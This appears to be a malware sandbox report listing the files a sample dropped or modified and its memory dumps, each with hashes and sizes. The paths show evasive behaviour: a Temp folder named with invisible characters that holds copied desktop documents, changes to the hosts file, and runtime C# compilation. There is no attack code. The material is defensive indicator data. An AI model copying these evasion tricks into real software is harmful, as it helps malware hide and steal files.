C:\Users\Admin\AppData\Local\Temp\scoped_dir1164_167883325\5a02a968-3f7f-4a00-b9e6-63c6c6c814f4.tmp

Filesize
150KB

MD5
14937b985303ecce4196154a24fc369a

SHA1
ecfe89e11a8d08ce0c8745ff5735d5edad683730

SHA256
71006a5311819fef45c659428944897184880bcdb571bf68c52b3d6ee97682ff

SHA512
1d03c75e4d2cd57eee7b0e93e2de293b41f280c415fb2446ac234fc5afd11fe2f2fcc8ab9843db0847c2ce6bd7df7213fcf249ea71896fbf6c0696e3f5aee46c

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir1164_167883325\CRX_INSTALL\_locales\en\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌ ‎\Common Files\Desktop\AddRestart.xlsx

Filesize
11KB

MD5
44754e779fccf81777f3e6366a3eff9b

SHA1
93a4edb26354d6608ad5a6a80e18c7524b6a0935

SHA256
109fb26cf3569b0d6a16dda07bf7229197a88f7a683557bc5ef27903a8f848d1

SHA512
f7d5190e8ed7350a3da5750ad77e40d53451f7cf85384b67aa4c77a8b21d27ef73bf4472210f36d75262918d6727c1c6ac4abcd101d82e637b21993c66a84d9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌ ‎\Common Files\Desktop\ApproveSave.csv

Filesize
634KB

MD5
6d384286548caee3f410bbb619c14be5

SHA1
1fc899808ede822a43d4db45a8477224890b3e42

SHA256
9449dcddfb00aa3ec4671ffa42c1e1ca7fd278b3006f47d1afb96ddb44e94fd0

SHA512
37c92feca6199616ad3be676c7eb799a221a08c2df4b80a2bf3332c97d4f83d11195adef17022bfeb5558676a470bf4eb839563f0a511dfa84f47d8f42c9482d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌ ‎\Common Files\Desktop\ExportSend.docx

Filesize
423KB

MD5
7143083df713d22dd232ba6731f63cb1

SHA1
75f74d556592529459a55ce27fe9ce13aeb3efe2

SHA256
b6748e4e842e702742bf4471a1cfcb9e81c7c74eec0282ae9bb44011bc174be2

SHA512
f5102eb0ecf2c608516d65d8ae3cc7d13aa62a6ea84e042c3c1f9e6839052d043bbc243aa2efd03c1856bab52dc039f7b824bd148e21473ca2eb8d685ccd0be3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌ ‎\Common Files\Desktop\GroupUnpublish.xlsx

Filesize
13KB

MD5
2e543967fed1cd9f33f40f827fb8daff

SHA1
7c661c4da6d3719ce21daeb07174f982708685a2

SHA256
e8c851e7d02e7cda3b1f7f14fdcce239b8e95bef23b6e9392370cfd4b55e1842

SHA512
56cc9e13d52a0267a032acca2f5db0355fd81654b1038821e01a6522c8218e60027ca6bcc9e6b306d8e2c229a6970ad70b7d2b10cbd12d757b4bf2f7130d5f3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌ ‎\Common Files\Desktop\LockPing.mp4

Filesize
550KB

MD5
7cc0fb52ce9142cc27cbf5f2212f6387

SHA1
bd31f81f667abcba78890e7f93510b56de764cc3

SHA256
c1c15214fad12618f1859002c8c2f5c5f30151db46cebb612e2f192c2c3b9062

SHA512
64c4c0bf95e307f627f92585d0dd606836f368727c43137eeab61267104a23bc7e5ce8072792600bf36eafbc4f1d9dbb51eda5437aa116ada294e2ee2a2353b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌ ‎\Common Files\Desktop\UninstallExpand.docx

Filesize
401KB

MD5
eba820a8a54971e155255f524654498c

SHA1
eaf4e2fb9e67aba267a05470ce8a63ec96103c7b

SHA256
e744bd4233c94a3c9a9211c9c2a9d0f49c9c94882b10d1680029b88c0bbce99e

SHA512
85a7b1b3fda9b19442831c2fe40eeb44623adbd3a238e995c733054f488b63aa793e6dd12329d56281457f042e259349d8f6bfd87bfb850b54477dc7e25f9148

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‌ ‎\Common Files\Desktop\UnpublishOpen.docx

Filesize
13KB

MD5
5cf6b54f683c032be69ad52b958500aa

SHA1
1424f720d0a4df8e28ba1644d5e20e83eb75699c

SHA256
f076000c09b6018a028d15c4d1352b27ffb53ba3461860905e6e79519d10fed0

SHA512
3d874ff3d7a134e5afa53efe6b068e119090a6eedc41329489cade9c9618652b6f7ddb3e1038745499cd1cf67145dee5444a776fd141918000d5c1fd8900d091

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
10KB

MD5
90901f9bbb9de51c5a024949e87c48ed

SHA1
5367617178f26c5ce16ff4add10b2496ae631161

SHA256
735ec74a5be04ddd236b8eda18bc19ea4641b9ca748ac03437efc6dc869a770e

SHA512
79b79fa55ac7756134c5cf20e2f3ede430e465ad188c8e1003e45df040868465e6333c4eabd3f8da0ffb60a56ae2df05ce1689b9364bfd8a280c21b460759230

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5d696d521de238c3.customDestinations-ms

Filesize
8KB

MD5
46609b63782edd4a141af5f12e96844e

SHA1
e8b532e95b733c85bf842294d31d19a86924d3ac

SHA256
d0868876607e511d808054c55d5957cab9f85e27cc4b47e087e5882673084ec8

SHA512
8f8cdfba8026fff04f8b963e8d8c7957b42fdc5a8240bccd386cf326a73b842924958138ee9a30d5aa29f9d71b8dc86ef7ff14051ce8db6d03e1ca873d1f76d4

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mhrnpza0\CSC7FECCFD210C2484CAC60A0B4585D99B7.TMP

Filesize
652B

MD5
02b5b2eea31d93831a7a091ea2d4705b

SHA1
fba5fc59619914ecc48a95a229209b2858826dd4

SHA256
b44085f04d703f1fdc7c9ac61eba0d70d3bcfc9842adbde922646df93206e6d8

SHA512
efb61e059fb7abe8b231e09a8baddf20f0b817afebaa0ee573b1b635cff075f5b74f6bfb05532487611a54cea570b9d4a644ff2f18d0cd9389ec227216493222

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mhrnpza0\mhrnpza0.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\mhrnpza0\mhrnpza0.cmdline

Filesize
607B

MD5
78647fd59572e19b0e271d57c35dacae

SHA1
3ee1bb0ec3fcacbab2b1b6ff98ad464ea9423a8f

SHA256
89ff4480f1e1eb742414ded9e3f60c95c53f2e7cb6ef95f1c95aab13e028e42e

SHA512
ca551fc794227a8646ab26c7456ff718d8f52a5b0cfb89804be6fbe9e86544aef41d2f37fa6ed8964854db169a97b14568106e872c9944f2befc6242aa744078

Download Submit
memory/3168-223-0x000001B6D6860000-0x000001B6D6868000-memory.dmp

Filesize
32KB

Download
memory/3368-83-0x00007FFE123D0000-0x00007FFE123F3000-memory.dmp

Filesize
140KB

Download
memory/3368-131-0x00007FFE032F0000-0x00007FFE033A8000-memory.dmp

Filesize
736KB

Download
memory/3368-412-0x00007FFE17560000-0x00007FFE17584000-memory.dmp

Filesize
144KB

Download
memory/3368-413-0x00007FFE1B5F0000-0x00007FFE1B5FF000-memory.dmp

Filesize
60KB

Download
memory/3368-414-0x00007FFE12660000-0x00007FFE1268D000-memory.dmp

Filesize
180KB

Download
memory/3368-415-0x00007FFE12400000-0x00007FFE12419000-memory.dmp

Filesize
100KB

Download
memory/3368-416-0x00007FFE123D0000-0x00007FFE123F3000-memory.dmp

Filesize
140KB

Download
memory/3368-417-0x00007FFE03040000-0x00007FFE031B3000-memory.dmp

Filesize
1.4MB

Download
memory/3368-418-0x00007FFE11F90000-0x00007FFE11FA9000-memory.dmp

Filesize
100KB

Download
memory/3368-419-0x00007FFE16580000-0x00007FFE1658D000-memory.dmp

Filesize
52KB

Download
memory/3368-420-0x00007FFE129F0000-0x00007FFE12A1E000-memory.dmp

Filesize
184KB

Download
memory/3368-421-0x00007FFE032F0000-0x00007FFE033A8000-memory.dmp

Filesize
736KB

Download
memory/3368-425-0x00007FFE027D0000-0x00007FFE02B45000-memory.dmp

Filesize
3.5MB

Download
memory/3368-422-0x00007FFE18860000-0x00007FFE18874000-memory.dmp

Filesize
80KB

Download
memory/3368-423-0x00007FFE129E0000-0x00007FFE129ED000-memory.dmp

Filesize
52KB

Download
memory/3368-424-0x00007FFE031D0000-0x00007FFE032EC000-memory.dmp

Filesize
1.1MB

Download
memory/3368-336-0x00007FFE033B0000-0x00007FFE03998000-memory.dmp

Filesize
5.9MB

Download
memory/3368-280-0x00007FFE17560000-0x00007FFE17584000-memory.dmp

Filesize
144KB

Download
memory/3368-285-0x00007FFE03040000-0x00007FFE031B3000-memory.dmp

Filesize
1.4MB

Download
memory/3368-288-0x00007FFE129F0000-0x00007FFE12A1E000-memory.dmp

Filesize
184KB

Download
memory/3368-289-0x00007FFE032F0000-0x00007FFE033A8000-memory.dmp

Filesize
736KB

Download
memory/3368-279-0x00007FFE033B0000-0x00007FFE03998000-memory.dmp

Filesize
5.9MB

Download
memory/3368-290-0x00007FFE027D0000-0x00007FFE02B45000-memory.dmp

Filesize
3.5MB

Download
memory/3368-133-0x000001AFD44F0000-0x000001AFD4865000-memory.dmp

Filesize
3.5MB

Download
memory/3368-132-0x00007FFE027D0000-0x00007FFE02B45000-memory.dmp

Filesize
3.5MB

Download
memory/3368-411-0x00007FFE033B0000-0x00007FFE03998000-memory.dmp

Filesize
5.9MB

Download
memory/3368-130-0x00007FFE129F0000-0x00007FFE12A1E000-memory.dmp

Filesize
184KB

Download
memory/3368-87-0x00007FFE11F90000-0x00007FFE11FA9000-memory.dmp

Filesize
100KB

Download
memory/3368-80-0x00007FFE129E0000-0x00007FFE129ED000-memory.dmp

Filesize
52KB

Download
memory/3368-84-0x00007FFE03040000-0x00007FFE031B3000-memory.dmp

Filesize
1.4MB

Download
memory/3368-85-0x00007FFE031D0000-0x00007FFE032EC000-memory.dmp

Filesize
1.1MB

Download
memory/3368-74-0x00007FFE027D0000-0x00007FFE02B45000-memory.dmp

Filesize
3.5MB

Download
memory/3368-78-0x00007FFE18860000-0x00007FFE18874000-memory.dmp

Filesize
80KB

Download
memory/3368-75-0x000001AFD44F0000-0x000001AFD4865000-memory.dmp

Filesize
3.5MB

Download
memory/3368-76-0x00007FFE17560000-0x00007FFE17584000-memory.dmp

Filesize
144KB

Download
memory/3368-73-0x00007FFE033B0000-0x00007FFE03998000-memory.dmp

Filesize
5.9MB

Download
memory/3368-70-0x00007FFE032F0000-0x00007FFE033A8000-memory.dmp

Filesize
736KB

Download
memory/3368-68-0x00007FFE129F0000-0x00007FFE12A1E000-memory.dmp

Filesize
184KB

Download
memory/3368-64-0x00007FFE11F90000-0x00007FFE11FA9000-memory.dmp

Filesize
100KB

Download
memory/3368-66-0x00007FFE16580000-0x00007FFE1658D000-memory.dmp

Filesize
52KB

Download
memory/3368-60-0x00007FFE12400000-0x00007FFE12419000-memory.dmp

Filesize
100KB

Download
memory/3368-62-0x00007FFE03040000-0x00007FFE031B3000-memory.dmp

Filesize
1.4MB

Download
memory/3368-61-0x00007FFE123D0000-0x00007FFE123F3000-memory.dmp

Filesize
140KB

Download
memory/3368-56-0x00007FFE12660000-0x00007FFE1268D000-memory.dmp

Filesize
180KB

Download
memory/3368-32-0x00007FFE17560000-0x00007FFE17584000-memory.dmp

Filesize
144KB

Download
memory/3368-33-0x00007FFE1B5F0000-0x00007FFE1B5FF000-memory.dmp

Filesize
60KB

Download
memory/3368-26-0x00007FFE033B0000-0x00007FFE03998000-memory.dmp

Filesize
5.9MB

Download
memory/3524-124-0x00007FFE01C50000-0x00007FFE02711000-memory.dmp

Filesize
10.8MB

Download
memory/3524-101-0x00007FFE01C50000-0x00007FFE02711000-memory.dmp

Filesize
10.8MB

Download
memory/3524-97-0x000001C021C80000-0x000001C021CA2000-memory.dmp

Filesize
136KB

Download
memory/3524-95-0x00007FFE01C50000-0x00007FFE02711000-memory.dmp

Filesize
10.8MB

Download
memory/3524-86-0x00007FFE01C53000-0x00007FFE01C55000-memory.dmp

Filesize
8KB

Download